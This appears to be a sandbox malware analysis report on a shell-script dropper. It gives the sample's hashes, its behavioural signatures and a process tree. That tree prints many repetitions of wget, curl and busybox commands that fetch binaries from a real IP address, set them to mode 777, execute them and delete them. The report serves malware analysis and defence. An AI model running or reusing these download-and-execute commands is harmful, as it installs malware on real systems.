Analysis
-
max time kernel
60s -
max time network
62s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mips image:debian9-mipsbe-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system -
submitted
25/10/2024, 01:26
Static task
static1
Behavioral task
behavioral1
Sample
3de5523f3b546ee7c0ad86dd663e608fe072c6a276cb0e72e2ba834d1dca31a2.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
3de5523f3b546ee7c0ad86dd663e608fe072c6a276cb0e72e2ba834d1dca31a2.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
3de5523f3b546ee7c0ad86dd663e608fe072c6a276cb0e72e2ba834d1dca31a2.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
3de5523f3b546ee7c0ad86dd663e608fe072c6a276cb0e72e2ba834d1dca31a2.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
3de5523f3b546ee7c0ad86dd663e608fe072c6a276cb0e72e2ba834d1dca31a2.sh
-
Size
10KB
-
MD5
d230b0059d55644a966d0f2b3a653b23
-
SHA1
003616a6507ccbca767f2e56341b347b94f487da
-
SHA256
3de5523f3b546ee7c0ad86dd663e608fe072c6a276cb0e72e2ba834d1dca31a2
-
SHA512
a1badc3ffaa64936805465c8e74e14083c226341b67e35b985dee197f0a8487e2d4c99fcb203e633dd67e60963b748b38a743e4d94b48038d381bfdd460e2f4f
-
SSDEEP
96:iwrwrw7vQ4vx64/jk3WKJsPGOhC+tlxnAltsw/JlJdJgJRJNJ1ChSkdz/jk3WK8i:ik4ET564/jk3vJsbIW6/jk3v3lk4ETgB
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 28 IoCs
-
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/3de5523f3b546ee7c0ad86dd663e608fe072c6a276cb0e72e2ba834d1dca31a2.sh/tmp/3de5523f3b546ee7c0ad86dd663e608fe072c6a276cb0e72e2ba834d1dca31a2.sh1⤵PID:702
-
/bin/rm/bin/rm bins.sh2⤵PID:706
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵PID:710
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:719
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵PID:728
-
-
/bin/chmodchmod 777 3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵
- File and Directory Permissions Modification
PID:731
-
-
/tmp/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH./3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵
- Executes dropped EXE
PID:733
-
-
/bin/rmrm 3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵PID:734
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵PID:735
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:737
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵PID:738
-
-
/bin/chmodchmod 777 q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵
- File and Directory Permissions Modification
PID:739
-
-
/tmp/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h./q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵
- Executes dropped EXE
PID:740
-
-
/bin/rmrm q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵PID:741
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM2⤵PID:742
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:743
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM2⤵PID:744
-
-
/bin/chmodchmod 777 eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM2⤵
- File and Directory Permissions Modification
PID:745
-
-
/tmp/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM./eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM2⤵
- Executes dropped EXE
PID:746
-
-
/bin/rmrm eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM2⤵PID:747
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵PID:748
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:749
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵PID:750
-
-
/bin/chmodchmod 777 Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵
- File and Directory Permissions Modification
PID:754
-
-
/tmp/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd./Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵
- Executes dropped EXE
PID:755
-
-
/bin/rmrm Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵PID:758
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵PID:760
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:765
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵PID:772
-
-
/bin/chmodchmod 777 SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵
- File and Directory Permissions Modification
PID:788
-
-
/tmp/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM./SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵
- Executes dropped EXE
PID:790
-
-
/bin/rmrm SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵PID:792
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵PID:794
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:801
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵PID:807
-
-
/bin/chmodchmod 777 EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵
- File and Directory Permissions Modification
PID:808
-
-
/tmp/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI./EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵
- Executes dropped EXE
PID:809
-
-
/bin/rmrm EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵PID:810
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵PID:811
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:812
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵PID:813
-
-
/bin/chmodchmod 777 v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵
- File and Directory Permissions Modification
PID:814
-
-
/tmp/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG./v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵
- Executes dropped EXE
PID:815
-
-
/bin/rmrm v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵PID:816
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B2⤵PID:817
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:818
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B2⤵PID:819
-
-
/bin/chmodchmod 777 GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B2⤵
- File and Directory Permissions Modification
PID:820
-
-
/tmp/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B./GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B2⤵
- Executes dropped EXE
PID:821
-
-
/bin/rmrm GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B2⤵PID:822
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg2⤵PID:823
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:826
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg2⤵PID:836
-
-
/bin/chmodchmod 777 GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg2⤵
- File and Directory Permissions Modification
PID:859
-
-
/tmp/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg./GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg2⤵
- Executes dropped EXE
PID:860
-
-
/bin/rmrm GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg2⤵PID:861
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵PID:862
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:863
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵PID:864
-
-
/bin/chmodchmod 777 KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵
- File and Directory Permissions Modification
PID:865
-
-
/tmp/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj./KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵
- Executes dropped EXE
PID:866
-
-
/bin/rmrm KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵PID:867
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy2⤵PID:868
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:869
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy2⤵PID:870
-
-
/bin/chmodchmod 777 IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy2⤵
- File and Directory Permissions Modification
PID:871
-
-
/tmp/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy./IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy2⤵
- Executes dropped EXE
PID:872
-
-
/bin/rmrm IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy2⤵PID:873
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc2⤵PID:874
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:875
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc2⤵PID:876
-
-
/bin/chmodchmod 777 IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc2⤵
- File and Directory Permissions Modification
PID:877
-
-
/tmp/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc./IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc2⤵
- Executes dropped EXE
PID:878
-
-
/bin/rmrm IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc2⤵PID:879
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF52⤵PID:880
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:881
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF52⤵PID:882
-
-
/bin/chmodchmod 777 XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF52⤵
- File and Directory Permissions Modification
PID:883
-
-
/tmp/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5./XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF52⤵
- Executes dropped EXE
PID:884
-
-
/bin/rmrm XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF52⤵PID:885
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw2⤵PID:886
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:887
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw2⤵PID:888
-
-
/bin/chmodchmod 777 Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw2⤵
- File and Directory Permissions Modification
PID:889
-
-
/tmp/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw./Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw2⤵
- Executes dropped EXE
PID:890
-
-
/bin/rmrm Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw2⤵PID:891
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵PID:892
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:893
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵PID:894
-
-
/bin/chmodchmod 777 Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵
- File and Directory Permissions Modification
PID:895
-
-
/tmp/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd./Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵
- Executes dropped EXE
PID:896
-
-
/bin/rmrm Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵PID:897
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵PID:898
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:899
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵PID:900
-
-
/bin/chmodchmod 777 SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵
- File and Directory Permissions Modification
PID:901
-
-
/tmp/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM./SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵
- Executes dropped EXE
PID:902
-
-
/bin/rmrm SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵PID:903
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵PID:904
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:905
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵PID:906
-
-
/bin/chmodchmod 777 EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵
- File and Directory Permissions Modification
PID:907
-
-
/tmp/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI./EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵
- Executes dropped EXE
PID:908
-
-
/bin/rmrm EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵PID:909
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵PID:910
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:911
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵PID:912
-
-
/bin/chmodchmod 777 v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵
- File and Directory Permissions Modification
PID:913
-
-
/tmp/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG./v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵
- Executes dropped EXE
PID:914
-
-
/bin/rmrm v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵PID:915
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵PID:916
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:917
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵PID:918
-
-
/bin/chmodchmod 777 KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵
- File and Directory Permissions Modification
PID:919
-
-
/tmp/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj./KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵
- Executes dropped EXE
PID:920
-
-
/bin/rmrm KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵PID:921
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy2⤵PID:922
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:923
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy2⤵PID:924
-
-
/bin/chmodchmod 777 IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy2⤵
- File and Directory Permissions Modification
PID:925
-
-
/tmp/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy./IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy2⤵
- Executes dropped EXE
PID:926
-
-
/bin/rmrm IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy2⤵PID:927
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc2⤵PID:928
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:929
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc2⤵PID:930
-
-
/bin/chmodchmod 777 IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc2⤵
- File and Directory Permissions Modification
PID:931
-
-
/tmp/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc./IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc2⤵
- Executes dropped EXE
PID:932
-
-
/bin/rmrm IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc2⤵PID:933
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF52⤵PID:934
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:935
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF52⤵PID:936
-
-
/bin/chmodchmod 777 XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF52⤵
- File and Directory Permissions Modification
PID:937
-
-
/tmp/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5./XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF52⤵
- Executes dropped EXE
PID:938
-
-
/bin/rmrm XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF52⤵PID:939
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B2⤵PID:940
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:941
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B2⤵PID:942
-
-
/bin/chmodchmod 777 GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B2⤵
- File and Directory Permissions Modification
PID:943
-
-
/tmp/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B./GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B2⤵
- Executes dropped EXE
PID:944
-
-
/bin/rmrm GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B2⤵PID:945
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg2⤵PID:946
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:947
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg2⤵PID:948
-
-
/bin/chmodchmod 777 GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg2⤵
- File and Directory Permissions Modification
PID:949
-
-
/tmp/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg./GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg2⤵
- Executes dropped EXE
PID:950
-
-
/bin/rmrm GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg2⤵PID:951
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw2⤵PID:952
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:953
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw2⤵PID:954
-
-
/bin/chmodchmod 777 Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw2⤵
- File and Directory Permissions Modification
PID:955
-
-
/tmp/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw./Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw2⤵
- Executes dropped EXE
PID:956
-
-
/bin/rmrm Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw2⤵PID:957
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵PID:958
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:959
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵PID:960
-
-
/bin/chmodchmod 777 3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵
- File and Directory Permissions Modification
PID:961
-
-
/tmp/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH./3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵
- Executes dropped EXE
PID:962
-
-
/bin/rmrm 3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵PID:963
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵PID:964
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:965
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵PID:966
-
-
/bin/chmodchmod 777 q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵
- File and Directory Permissions Modification
PID:967
-
-
/tmp/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h./q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵
- Executes dropped EXE
PID:968
-
-
/bin/rmrm q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵PID:969
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM2⤵PID:970
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:971
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM2⤵PID:972
-
-
/bin/chmodchmod 777 eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM2⤵
- File and Directory Permissions Modification
PID:973
-
-
/tmp/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM./eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM2⤵
- Executes dropped EXE
PID:974
-
-
/bin/rmrm eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM2⤵PID:975
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97